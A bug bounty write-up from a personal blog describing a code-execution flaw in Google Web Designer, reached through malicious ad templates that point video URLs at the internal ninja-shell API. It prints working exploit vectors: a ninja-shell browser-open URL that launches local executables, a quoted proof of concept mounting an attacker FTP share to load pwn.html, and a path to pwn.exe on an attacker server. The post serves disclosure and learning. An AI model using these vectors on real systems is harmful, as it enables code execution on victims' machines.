<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Abusing the NinjaShell API for Code Execution in Google Web Designer | sudi’s blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Abusing the NinjaShell API for Code Execution in Google Web Designer" />
<meta name="author" content="sudi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Technical breakdown of a Remote Code Execution vulnerability in Google Web Designer via a malicious Video Ad Template abusing the NinjaShell API." />
<meta property="og:description" content="Technical breakdown of a Remote Code Execution vulnerability in Google Web Designer via a malicious Video Ad Template abusing the NinjaShell API." />
<link rel="canonical" href="http://localhost:4000/2025/09/23/RCE-in-web-designer.html" />
<meta property="og:url" content="http://localhost:4000/2025/09/23/RCE-in-web-designer.html" />
<meta property="og:site_name" content="sudi’s blog" />
<meta property="og:image" content="http://localhost:4000/tmp/cdn-images//vlc_F5uL7S9FCj.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-09-23T00:00:00+05:30" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="http://localhost:4000/tmp/cdn-images//vlc_F5uL7S9FCj.png" />
<meta property="twitter:title" content="Abusing the NinjaShell API for Code Execution in Google Web Designer" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"sudi"},"dateModified":"2025-09-23T00:00:00+05:30","datePublished":"2025-09-23T00:00:00+05:30","description":"Technical breakdown of a Remote Code Execution vulnerability in Google Web Designer via a malicious Video Ad Template abusing the NinjaShell API.","headline":"Abusing the NinjaShell API for Code Execution in Google Web Designer","image":"http://localhost:4000/tmp/cdn-images//vlc_F5uL7S9FCj.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2025/09/23/RCE-in-web-designer.html"},"url":"http://localhost:4000/2025/09/23/RCE-in-web-designer.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="sudi&apos;s blog" />
<script src="//cdn.jsdelivr.net/npm/@microlink/vanilla@latest/umd/microlink.min.js"></script>

<script>
  document.addEventListener('DOMContentLoaded', function (event) {
    microlink('.card-preview')
  })
</script>
  
</head>
<body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="/">sudi&#39;s blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Abusing the NinjaShell API for Code Execution in Google Web Designer</h1>
    <p class="post-meta"><time class="dt-published" datetime="2025-09-23T00:00:00+05:30" itemprop="datePublished">
        Sep 23, 2025
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>Heyyy Everyone,</p>

<p><em>Google Web Designer</em> has been on my radar for quite some time because of this person: <a href="https://balintmagyar.com">https://balintmagyar.com</a>
. He has been finding so many cool RCEs in this single desktop application, which made me so interested to look into it and try to find one myself.</p>

<p>When someone puts out a blogpost, rather than just reading it, I always try to reproduce it. If it’s possible to set up an older version of the same app, I’ll do that and try to reproduce the bug. This is actually very important because sometimes some bugs are much harder in practice than they seem just from reading the blogpost. Doing this gives you more understanding of the application, which helps in finding similar bugs in other areas or even bypasses of the same bug.</p>

<p>For Google Web Designer as well, it’s the same. Bálint Magyar put out a bunch of blogposts:</p>

<p><br /></p>
<center><a href="https://balintmagyar.com/articles/google-web-designer-symlink-client-side-rce-cve-2025-1079" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<p><br /></p>
<center><a href="https://balintmagyar.com/articles/google-web-designer-path-traversal-client-side-rce-cve-2025-4613" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<p>Just by reading and reproducing these bugs, you start to get an idea of the attack surface and where you can look for potential entry points.</p>

<p>Since we’re targeting a desktop application and not a normal web app, the input sources need to be identified first. In such cases, it’s most often the exported project files themselves that you can open in the application.</p>

<p>One such input was a malicious ad template package, which you can import into the application and use.</p>

<p><img alt="image" src="/tmp/cdn-images/Code_mexdtuaT5a.png" />
<img alt="image" src="/tmp/cdn-images/Code_V2lQVX6KH5.png" /></p>

<p>Bálint’s exploit was through the <code class="language-plaintext highlighter-rouge">remoteAssets</code> key, where he discovered a URL parsing behavior that made <em>Google Web Designer (GWD)</em> fetch resources from an arbitrary origin. I started out by looking for any bypasses of the same issue but didn’t have much success. So, I decided to look into similar inputs instead.</p>

<p>Just above the <code class="language-plaintext highlighter-rouge">remoteAssets</code> key, you can see three similarly named keys that also contain URLs as their values:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="w">      </span><span class="nl">"videoThumbnailUrlSmall"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://storage.googleapis.com/gwd_video_templates/thumbnail_videos/Multisize_Video_With_Text_Panel_Overlay_And_Logo_6s_300x168.mp4"</span><span class="err">,</span><span class="w">
      </span><span class="nl">"videoThumbnailUrlLarge"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://storage.googleapis.com/gwd_video_templates/thumbnail_videos/Multisize_Video_With_Text_Panel_Overlay_And_Logo_6s_600x338.mp4"</span><span class="err">,</span><span class="w">
      </span><span class="nl">"videoPreviewRootUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://storage.googleapis.com/gwd_video_templates/preview_videos/Multisize_Video_With_Text_Panel_Overlay_And_Logo_6s"</span><span class="err">,</span><span class="w">
</span></code></pre></div></div>

<p>I simply replaced the values for these keys with my own webhook URL, and soon enough I received a pingback when I loaded that template:</p>

<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GET</span> <span class="nn">/?body=%3Cscript%3Efetch(%27/xss%27)%3C/script%3E</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">yvyedbhvbnmwsqqztgnyw7fw0o04kd4fu.oast.fun</span>
<span class="na">Sec-Ch-Ua</span><span class="p">:</span> <span class="s">"Chromium";v="119", "Not?A_Brand";v="24"</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate, br</span>
<span class="na">Sec-Ch-Ua-Mobile</span><span class="p">:</span> <span class="s">?0</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36</span>
<span class="na">Sec-Ch-Ua-Platform</span><span class="p">:</span> <span class="s">"Windows"</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">*/*</span>
<span class="na">Sec-Fetch-Site</span><span class="p">:</span> <span class="s">cross-site</span>
<span class="na">Sec-Fetch-Mode</span><span class="p">:</span> <span class="s">no-cors</span>
<span class="na">Sec-Fetch-Dest</span><span class="p">:</span> <span class="s">video</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.9</span>
<span class="na">Range</span><span class="p">:</span> <span class="s">bytes=0-</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">keep-alive</span>
</code></pre></div></div>

<p>From the <code class="language-plaintext highlighter-rouge">Sec-Fetch-Dest</code> header, it’s clear that my URL was being loaded inside a video element’s src attribute. My initial thought was that if it were being loaded in a new window or an iframe instead, it could provide a script execution primitive and since the Chromium version used here is old, renderer exploits could potentially lead to direct RCE.</p>

<p>At this point, I tried to see if I could access the developer console. GWD uses the Chromium Embedded Framework (CEF), which is evident from the User-Agent. If I could find a way to debug the page (which is basically HTML/JS), I might be able to escalate this further.</p>

<p>I attempted to use Frida to hook into the process and inject remote debugging flags into the renderer processes, but they didn’t seem to work for me. Below is a sample hooking script I created with ChatGPT to try injecting <code class="language-plaintext highlighter-rouge">--remote-debugging-port</code>, but for some reason, it never worked:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// File: debug_renderers_proper.js</span>
<span class="kd">let</span> <span class="nx">rendererCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">BASE_PORT</span> <span class="o">=</span> <span class="mi">9222</span><span class="p">;</span>

<span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Starting proper argument injection...</span><span class="dl">"</span><span class="p">);</span>

<span class="kd">const</span> <span class="nx">APIs</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">CreateProcessW</span><span class="dl">"</span><span class="p">,</span> <span class="na">module</span><span class="p">:</span> <span class="dl">"</span><span class="s2">kernel32.dll</span><span class="dl">"</span> <span class="p">},</span>
    <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">CreateProcessInternalW</span><span class="dl">"</span><span class="p">,</span> <span class="na">module</span><span class="p">:</span> <span class="dl">"</span><span class="s2">kernelbase.dll</span><span class="dl">"</span> <span class="p">}</span>
<span class="p">];</span>

<span class="nx">APIs</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">api</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="kd">const</span> <span class="nx">address</span> <span class="o">=</span> <span class="nx">Module</span><span class="p">.</span><span class="nf">findExportByName</span><span class="p">(</span><span class="nx">api</span><span class="p">.</span><span class="nx">module</span><span class="p">,</span> <span class="nx">api</span><span class="p">.</span><span class="nx">name</span><span class="p">);</span>
    <span class="k">if </span><span class="p">(</span><span class="nx">address</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">address</span><span class="p">,</span> <span class="p">{</span>
            <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">try</span> <span class="p">{</span>
                    <span class="kd">const</span> <span class="nx">cmdLinePtr</span> <span class="o">=</span> <span class="nx">args</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
                    <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">cmdLinePtr</span><span class="p">.</span><span class="nf">isNull</span><span class="p">())</span> <span class="p">{</span>
                        <span class="kd">let</span> <span class="nx">originalCmd</span> <span class="o">=</span> <span class="nx">cmdLinePtr</span><span class="p">.</span><span class="nf">readUtf16String</span><span class="p">();</span>
                        
                        <span class="k">if </span><span class="p">(</span><span class="nx">originalCmd</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">"</span><span class="s2">--type=renderer</span><span class="dl">"</span><span class="p">)</span> <span class="o">&amp;&amp;</span> 
                            <span class="o">!</span><span class="nx">originalCmd</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">"</span><span class="s2">--remote-debugging-port</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span>
                            
                            <span class="nx">rendererCount</span><span class="o">++</span><span class="p">;</span>
                            <span class="kd">const</span> <span class="nx">debugPort</span> <span class="o">=</span> <span class="nx">BASE_PORT</span> <span class="o">+</span> <span class="nx">rendererCount</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
                            
                            <span class="c1">// PROPER POSITIONING: Insert before /prefetch:</span>
                            <span class="kd">const</span> <span class="nx">prefetchIndex</span> <span class="o">=</span> <span class="nx">originalCmd</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">/prefetch:</span><span class="dl">"</span><span class="p">);</span>
                            <span class="kd">let</span> <span class="nx">newCmd</span> <span class="o">=</span> <span class="nx">originalCmd</span><span class="p">;</span>
                            
                            <span class="k">if </span><span class="p">(</span><span class="nx">prefetchIndex</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
                                <span class="nx">newCmd</span> <span class="o">=</span> 
                                    <span class="nx">originalCmd</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">prefetchIndex</span><span class="p">)</span> <span class="o">+</span> 
                                    <span class="s2">` --remote-debugging-port=</span><span class="p">${</span><span class="nx">debugPort</span><span class="p">}</span><span class="s2"> `</span> <span class="o">+</span>
                                    <span class="nx">originalCmd</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="nx">prefetchIndex</span><span class="p">);</span>
                            <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                                <span class="nx">newCmd</span> <span class="o">=</span> <span class="nx">originalCmd</span> <span class="o">+</span> <span class="s2">` --remote-debugging-port=</span><span class="p">${</span><span class="nx">debugPort</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span>
                            <span class="p">}</span>
                            
                            <span class="c1">// Clean up any double spaces</span>
                            <span class="nx">newCmd</span> <span class="o">=</span> <span class="nx">newCmd</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\s</span><span class="sr">+/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1"> </span><span class="dl">'</span><span class="p">).</span><span class="nf">trim</span><span class="p">();</span>
                            
                            <span class="kd">const</span> <span class="nx">newCmdPtr</span> <span class="o">=</span> <span class="nx">Memory</span><span class="p">.</span><span class="nf">allocUtf16String</span><span class="p">(</span><span class="nx">newCmd</span><span class="p">);</span>
                            
                            <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span>
                                <span class="s2">`\n[+] Modified renderer #</span><span class="p">${</span><span class="nx">rendererCount</span><span class="p">}</span><span class="s2">\n`</span> <span class="o">+</span>
                                <span class="s2">`Port: </span><span class="p">${</span><span class="nx">debugPort</span><span class="p">}</span><span class="s2">\n`</span> <span class="o">+</span>
                                <span class="s2">`Before: </span><span class="p">${</span><span class="nx">originalCmd</span><span class="p">}</span><span class="s2">\n`</span> <span class="o">+</span>
                                <span class="s2">`After : </span><span class="p">${</span><span class="nx">newCmd</span><span class="p">}</span><span class="s2">\n`</span> <span class="o">+</span>
                                <span class="dl">"</span><span class="s2">-</span><span class="dl">"</span><span class="p">.</span><span class="nf">repeat</span><span class="p">(</span><span class="mi">60</span><span class="p">)</span>
                            <span class="p">);</span>
                            
                            <span class="nx">args</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="nx">newCmdPtr</span><span class="p">;</span>
                        <span class="p">}</span>
                    <span class="p">}</span>
                <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
                    <span class="nx">console</span><span class="p">.</span><span class="nf">error</span><span class="p">(</span><span class="s2">`Error in </span><span class="p">${</span><span class="nx">api</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="s2">:`</span><span class="p">,</span> <span class="nx">e</span><span class="p">);</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="p">});</span>
    <span class="p">}</span>
<span class="p">});</span>

<span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="se">\n</span><span class="s2">[+] Ready - Start debugging at:</span><span class="se">\n</span><span class="dl">"</span> <span class="o">+</span>
            <span class="s2">`http://localhost:</span><span class="p">${</span><span class="nx">BASE_PORT</span><span class="p">}</span><span class="s2">\n`</span> <span class="o">+</span>
            <span class="s2">`http://localhost:</span><span class="p">${</span><span class="nx">BASE_PORT</span> <span class="o">+</span> <span class="mi">1</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span>
</code></pre></div></div>

<p>This felt like a dead end, as I was only able to load my own domain by controlling the video src. I then started exploring other video templates available by default, and in one of them, I noticed something very interesting…</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="w">     </span><span class="nl">"videoThumbnailUrlSmall"</span><span class="p">:</span><span class="w"> </span><span class="s2">"//ninja-shell/api/file?method=read&amp;file=C:%5CUsers%5CSTARK-PC%5CDocuments%5CGoogle%20Web%20Designer%5Ctemplates%5Cdefaults%5CpreviewVideos%5Ca.mp4"</span><span class="err">,</span><span class="w">
      </span><span class="nl">"videoThumbnailUrlLarge"</span><span class="p">:</span><span class="w"> </span><span class="s2">"//ninja-shell/api/file?method=read&amp;file=C:%5CUsers%5CSTARK-PC%5CDocuments%5CGoogle%20Web%20Designer%5Ctemplates%5Cdefaults%5CpreviewVideos%5Ca.mp4"</span><span class="err">,</span><span class="w">
      </span><span class="nl">"videoPreviewRootUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"//ninja-shell/api/file?method=read&amp;file=C:%5CUsers%5CSTARK-PC%5CDocuments%5CGoogle%20Web%20Designer%5Ctemplates%5Cdefaults%5CpreviewVideos%5Ca"</span><span class="err">,</span><span class="w">
</span></code></pre></div></div>

<p>I had once noticed a mention of ninja-shell while proxying the application traffic through Burp. At first, it looked like just a random path to me, but after seeing the full URL, it turned out to be something very interesting.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//ninja-shell/api/file?method=read&amp;file=C:\Users\STARK-PC\Documents\Google Web Designer\templates\defaults\previewVideos\a.mp4
</code></pre></div></div>

<p>Simply treat this as a URL ninja-shell is the hostname, which is resolved internally by the application. There are some request listeners that, upon detecting this hostname, handle the request differently.
This meant I could make any request to the ninja-shell host, but since I don’t control the method, I’m limited to GET requests only.</p>

<p>I started enumerating more endpoints by checking the proxied JS files and also ran a simple strings command on the binary, grepping for “ninja” (hehe inspired from Renwa <a href="https://medium.com/@renwa/arc-browser-uxss-local-file-read-arbitrary-file-creation-and-path-traversal-to-rce-b439f2a299d1">https://medium.com/@renwa/arc-browser-uxss-local-file-read-arbitrary-file-creation-and-path-traversal-to-rce-b439f2a299d1</a>)</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>googleclient/webdesigner/shell/cef_objects/ninja_cef_client.cc
googleclient/webdesigner/shell/cef_objects/ninja_cef_app.cc
ninjaShell
</code></pre></div></div>

<p>Based on the naming of the file you can get an idea this ninja api allows the GWD to communicate with CEF</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//ninja-shell/api/preference?method=get
//ninja-shell/api/preference?method=read
//ninja-shell/api/browser?method=list
//ninja-shell/api/browser?method=open&amp;url=&amp;usedefaultapp=true
</code></pre></div></div>

<p>Out of the ones I found, this one caught my interest: <code class="language-plaintext highlighter-rouge">//ninja-shell/api/browser?method=open&amp;url=&amp;usedefaultapp=true</code>. Specifying any URL there opens it in the default browser. I quickly changed it to <code class="language-plaintext highlighter-rouge">file:///C:/Windows/System32/calc.exe</code> to see if it popped Calculator  and it worked :)</p>

<p>To execute an arbitrary binary, we can make the victim visit an attacker-controlled website first, have the victim download an executable from there, and then specify that executable’s location in the url parameter of the ninja-shell API. There is one limitation: the attacker needs to know the victim’s username beforehand because the Download folder is constructed like this: <code class="language-plaintext highlighter-rouge">C:\Users\STARK-PC\Downloads\pwn.exe</code>  the username can be anything.</p>

<p>I hoped the same url parameter would resolve SMB paths as well. I changed it to <code class="language-plaintext highlighter-rouge">\\&lt;IP&gt;\pwn.exe</code>, but it didn’t work.</p>

<p>I didn’t have many options left, so I decided to report it as-is for now and continue looking for different ways. I started searching for ninjaShell on Google to see if it’s part of some library or known component, and I stumbled upon a disclosed report  this is exactly what I was looking for, damnnn.</p>

<p><br /></p>
<center><a href="https://bughunters.google.com/reports/vrp/qMhY4nw9i" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<p>TLDR: Earlier GWD exposed a local server (Chrome Devtools Protocol) via the <code class="language-plaintext highlighter-rouge">--remote-debugging-port</code> flag. You can enumerate available endpoints via <code class="language-plaintext highlighter-rouge">/json/list</code>, and from there leak the <em>webSocketDebuggerUrl</em> for pages loaded in that Chrome process.</p>

<p><br /></p>
<center><a href="https://chromedevtools.github.io/devtools-protocol/" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<p>Sample response:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w">
  </span><span class="nl">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"devtoolsFrontendUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/devtools/inspector.html?ws=localhost:9222/devtools/page/DAB7FB6187B554E10B0BD18821265734"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"DAB7FB6187B554E10B0BD18821265734"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"title"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Yahoo"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"page"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"url"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://www.yahoo.com/"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"webSocketDebuggerUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ws://localhost:9222/devtools/page/DAB7FB6187B554E10B0BD18821265734"</span><span class="w">
</span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w">
</span></code></pre></div></div>

<p>Being able to leak <code class="language-plaintext highlighter-rouge">webSocketDebuggerUrl</code> means you can connect to that websocket and execute any arbitrary commands in the context of the loaded page. In the above example by connecting to that websocket you will able be to execute arbitrary js in the <a href="https://www.yahoo.com/">https://www.yahoo.com/</a> origin.</p>

<p>With DNS rebinding it would be possible to leak such url, but the main concern is how would you connect to it. In older versions it was possible to connect to this websocket port from any origin,but it got some nice mitigations in place to avoid such.</p>

<p>The only possible ways to connect to websocket now are either you have some sort script execution (xss) in the  origin specified in <code class="language-plaintext highlighter-rouge">--remote-allow-origins</code> flag (<code class="language-plaintext highlighter-rouge">*</code> in this flag means any origin is allowed :p) , another way is to remove the <code class="language-plaintext highlighter-rouge">Origin</code> header or not sent it at all for the handshake request. Browsers normally always send Origin, so this is hard.</p>

<p>I am aware about only one case where it was possible to do such, it used to work in Firefox. I do sure know a lot of people who are waiting for such to happen because it’s been used a sole measure to protect againsts CSRF as well 😆.</p>

<p>Actually there were two ways I found one by mistake, I loaded a csrf poc locally so the scheme was <code class="language-plaintext highlighter-rouge">file://</code> this made the Firefox browser not send any Origin header at all for any requests.</p>

<p>I submitted the report as it is (was for a private bbp CSRF bug) and realised later that the same poc would fail in real world when the attacker would host such in their own website. The solution for this I found on twitter can’t find the tweet now , someone found by embedding a data-URI HTML form CSRF PoC inside an iframe src  attribute you can make the browser to not send any Origin header.</p>

<p>But shortly after, this stopped working in newer versions of Firefox too, then I saw this disclosed report at that time he used the same poc and did confirm that it no longer works in newer versions :(</p>

<p><br /></p>
<center><a href="https://x.com/disclosedh1/status/1679139895883833348" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<hr />

<p>Ah so we took an unexpected turn back to GWD again, in that disclosed Google VRP report the researcher showed they are able to make requests to the <code class="language-plaintext highlighter-rouge">ninja-shell</code> host</p>

<p>This gives the following primitive:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Read / Write / Delete / List any file and folder the victim system user has access to. This is possible as Google Web Designer implements some special APIs which are triggered when you fetch a https://ninja-shell/api/{file|directory}?method={read|create|save|delete|exists|...}&amp;{file|path}= URL
</code></pre></div></div>

<p>The same endpoints also supports different methods eg PUT request can be used to write arbitrary files on the victim machines and as you are able to view the response of the request also you have file read primitive as well.</p>

<p>I am limited to GET based method only, so I couldn’t use the PUT method for arbitrary file write and get RCE using it.</p>

<p>Meanwhile I got the BOUNTY mail for my report, the amount was way lower than the previous RCEs found in the same application</p>

<p><img alt="image" src="/tmp/cdn-images/Screenshot 2025-09-30 172310.png" /></p>

<p>Google VRP is actually really nice, they give details on any factor which might have affected the bounty amount. It’s good because you can argue and provide more impact to overcome that downgrade medium.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>We applied a downgrade because the attack requires significant user interaction.
We applied a downgrade because of a minor impact the attack may have.
We applied a downgrade, determining that the issue is very likely unexploitable due to knowing information about the victims machine.
</code></pre></div></div>

<p>The  bounty which Bálint Magyar recieved for his RCE bug was 8.5k which relied on the same Malicous Ad Template, so I wondered -5k just for this limitation where the attacker needs to know the username doesn’t looks justified ? I appealed for the same asking Google to increase the bounty.</p>

<p>I tried asking on twitter as well, maybe someone knows a way. @Jorian did responded and provided some good ideas  but that didn’t turned out to be useful for those case.</p>

<p><img alt="image" src="/tmp/cdn-images/Screenshot 2025-09-30 174929.png" /></p>

<p>So in the end I had no other option for Windows, but later I stumbled upon this disclosed report from @RenwaX23.</p>

<p><br /></p>
<center><a href="https://bugcrowd.com/disclosures/f7ce8504-0152-483b-bbf3-fb9b759f9f89/critical-local-file-read-in-electron-desktop-app" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<p>From his poc</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;body&gt;</span>
<span class="nt">&lt;br&gt;&lt;br&gt;</span>
<span class="nt">&lt;h1</span> <span class="na">style=</span><span class="s">color:green</span> <span class="na">onclick=</span><span class="s">start()</span><span class="nt">&gt;</span>
Click Here and confirm the dialog boxes to connect
<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;script&gt;</span>
<span class="kd">function</span> <span class="nf">start</span><span class="p">(){</span>
<span class="nx">location</span><span class="o">=</span><span class="dl">'</span><span class="s1">ftp://tinnier-regions:slawbra23@files.000webhost.com</span><span class="dl">'</span><span class="p">;</span>
<span class="nf">setTimeout</span><span class="p">(()</span><span class="o">=&gt;</span><span class="p">{</span>
<span class="nx">location</span><span class="o">=</span><span class="dl">'</span><span class="s1">https://app.asana.com/-/desktop_app_link?path=/file:///Volumes/files.000webhost.com/public_html/pwn.html</span><span class="dl">'</span>
<span class="p">},</span><span class="mi">10000</span><span class="p">)</span>
<span class="p">}</span>

<span class="nt">&lt;/script&gt;</span>
</code></pre></div></div>

<p>On macOS, if a webpage navigates to the <code class="language-plaintext highlighter-rouge">ftp:</code> scheme using location, the Finder dialog box appears  clicking Open will automatically mount the share in an easily guessable location on the victim’s file system.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file:///Volumes/files.000webhost.com/public_html/pwn.html
</code></pre></div></div>

<p><br /></p>
<center><a href="https://github.com/Metnew/write-ups/tree/main/rce-github-desktop-2.9.3" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<p>I included these additional details in my reports, showing that the username requirement could be bypassed. After some time, I received this response 🥲. It seems they considered that there could be many bugs if users open or rely on such malicious templates, and the best way to handle this is simply to warn the user before opening untrusted templates.</p>

<p>This concept is similar to what Vscode does, where they would prompt and ask if the user trusts the workspace or not if it’s not trusted the directory is opened in a kindof sandbox environment where it disables a lot of vscode internal/extension features eg git,etc that might unknowingly allow executing arbitrary commands.</p>

<p><img alt="image" src="/tmp/cdn-images/Screenshot 2025-09-30 193104.png" /></p>

<p>In the end, it turned out like this  you can consider that they won’t accept such bugs anymore in Google Web Designer.</p>

<p><img alt="image" src="/tmp/cdn-images/Screenshot 2025-09-30 194328.png" /></p>

<p>Just a couple of weeks after my report was closed, I saw this banger from Bálint once again: it turns out he found the same type of bug but the sink was different. For me it was <code class="language-plaintext highlighter-rouge">video.src</code> in his case he injected the ninja-shell API URL in the <code class="language-plaintext highlighter-rouge">background-image</code> property, which when rendered makes a request to that specific URL.</p>

<p><br /></p>
<center><a href=" https://balintmagyar.com/articles/google-web-designer-css-injection-client-rce" class="card-preview" data-size="medium" target="_blank">
  Loading preview...
</a></center>
<p><br /></p>

<p>The RCE vector which he used was really cool, it clearly shows how I missed such. Every bug we miss is an oppurtunity to learn more :)</p>

<p>The vector which I was using for RCE:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//ninja-shell/api/browser?method=open&amp;url=/Volumes/attackerserver.com/public_html/pwn.exe&amp;usedefaultapp=true
</code></pre></div></div>

<p>The one  used by Bálint:</p>

